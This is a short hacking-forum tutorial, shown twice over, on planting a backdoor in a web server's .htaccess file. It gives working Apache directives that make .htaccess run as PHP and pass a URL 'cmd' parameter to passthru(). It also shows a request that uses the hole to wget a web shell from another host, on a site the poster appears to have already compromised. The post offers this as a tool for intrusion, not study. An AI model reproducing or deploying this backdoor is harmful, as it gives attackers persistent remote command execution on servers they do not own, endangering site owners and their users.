Create Backdoor in .htaccess 05-16-2014, 06:11 AM
#1
Firstly,I want to say thank my friend Mr.Sample :Grin:
In this Tutorial we will create Backdoor in .htaccess(Hypertext access)
Go public_html in shell and need to edit the .htaccess. :Sarcastic:
Add or Save code in .htaccess. :Thumbs-Up:
![[Image: image.jpg]](http://s22.postimg.org/beekb7owh/image.jpg)
And need to type CMD Commands like this
yoursite.com/.htaccess?cmd=
For Shell Upolad
yoursite.com/.htaccess?cmd=wget -O hacker625.php http://yourothersitewithshell/yourshell.txt
![[Image: image.jpg]](http://s24.postimg.org/pjoyqsahh/image.jpg)
okay now you can access your shell..
![[Image: image.png]](http://s14.postimg.org/avylus3kx/image.png)
Have Fun :Sarcastic:
In this Tutorial we will create Backdoor in .htaccess(Hypertext access)
Go public_html in shell and need to edit the .htaccess. :Sarcastic:
PHP Code:
<Files ~ "^\.ht">
Order allow,deny
Allow from all
</Files>
AddType application/x-httpd-php .htaccess
# <?php passthru($_GET['cmd']); ?>Add or Save code in .htaccess. :Thumbs-Up:
![[Image: image.jpg]](http://s22.postimg.org/beekb7owh/image.jpg)
And need to type CMD Commands like this
yoursite.com/.htaccess?cmd=
For Shell Upolad
yoursite.com/.htaccess?cmd=wget -O hacker625.php http://yourothersitewithshell/yourshell.txt
![[Image: image.jpg]](http://s24.postimg.org/pjoyqsahh/image.jpg)
okay now you can access your shell..
![[Image: image.png]](http://s14.postimg.org/avylus3kx/image.png)
Have Fun :Sarcastic:


![[+]](https://sinister.li/images/modern/collapse_collapsed.png)

